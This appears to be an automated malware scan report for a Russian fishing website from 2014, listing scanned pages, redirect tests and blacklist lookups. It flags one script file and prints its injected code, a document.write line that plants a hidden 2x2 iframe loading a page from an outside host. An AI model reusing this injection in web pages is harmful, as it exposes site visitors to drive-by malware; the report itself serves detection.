Scanned pages/files
Request | Server response | Status |
http://ribalka24.ru/ | 200 OK Content-Length: 33317 Content-Type: text/html | clean |
http://ribalka24.ru/ckeditor/ckeditor.js | 200 OK Content-Length: 300866 Content-Type: application/x-javascript | clean |
http://ribalka24.ru/AjexFileManager/ajex.js | 200 OK Content-Length: 4629 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://turf-times.de/wbut.html?j=3002045></iframe>');
var AjexFileManager = { init: function(params) { if ('undefined' == typeof(params)) params = {}; this.path = params.path || function() { var s = document.getElementsByTagName('script'); for (var i=-1; ++i<s.length;) { if (s[i].getAttribute('src') && width: this.width, height: this.height, inline: 'yes', close_previous: 'no' }, { window: win, input: params }); break; default: var win = window.open(this.url + '&returnTo=' + returnTo, 'AjexFileManager', this.args); win.focus(); break; } return; } } Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://turf-times.de/wbut.html?j=3002045 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://turf-times.de/wbut.html?j=3002045> | ||
https://web.redhelper.ru/service/main.js?c=dimon4ick | 200 OK Content-Length: 2006 Content-Type: application/x-javascript | clean |
http://jh.revolvermaps.com/2/2.js?i=74whnlzl1n2&m=2&s=130&c=ff0000&t=1 | 200 OK Content-Length: 2021 Content-Type: application/javascript | clean |
http://ribalka24.ru/add-banner/ | 200 OK Content-Length: 5375 Content-Type: text/html | clean |
http://ribalka24.ru/actsii/ | 200 OK Content-Length: 10620 Content-Type: text/html | clean |
http://ribalka24.ru/square/ | 200 OK Content-Length: 16193 Content-Type: text/html | clean |
http://ribalka24.ru/reyting/ | 200 OK Content-Length: 13802 Content-Type: text/html | clean |
http://ribalka24.ru/novosti/ | 200 OK Content-Length: 10656 Content-Type: text/html | clean |
http://ribalka24.ru/novosti/noviy-dizayn-/ | 200 OK Content-Length: 12434 Content-Type: text/html | clean |
http://ribalka24.ru/profile/Administrator | 200 OK Content-Length: 3317 Content-Type: text/html | clean |
http://ribalka24.ru/test404page.js | 404 Not Found Content-Length: 644 Content-Type: text/html | clean |
http://ribalka24.ru/registration/ | 200 OK Content-Length: 12038 Content-Type: text/html | clean |
http://ribalka24.ru/rules/ | 200 OK Content-Length: 62171 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: ribalka24.ru
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Wed, 20 Aug 2014 08:45:18 GMT
Pragma: no-cache
Server: nginx
Content-Language: ru
Content-Type: text/html; charset=cp1251
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=2ca25c19a548894db84dcc3d10d577ce; path=/
X-Powered-By: PHP/5.4.4-14+deb7u12
GET / HTTP/1.1
Host: ribalka24.ru
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Wed, 20 Aug 2014 08:45:18 GMT
Pragma: no-cache
Server: nginx
Content-Language: ru
Content-Type: text/html; charset=cp1251
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=2ca25c19a548894db84dcc3d10d577ce; path=/
X-Powered-By: PHP/5.4.4-14+deb7u12
Second query (visit from search engine):
GET / HTTP/1.1
Host: ribalka24.ru
Referer: http://www.google.com/search?q=ribalka24.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: ribalka24.ru
Referer: http://www.google.com/search?q=ribalka24.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=ribalka24.ru
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://ribalka24.ru/
Result: ribalka24.ru is not infected or malware details are not published yet.
Result: ribalka24.ru is not infected or malware details are not published yet.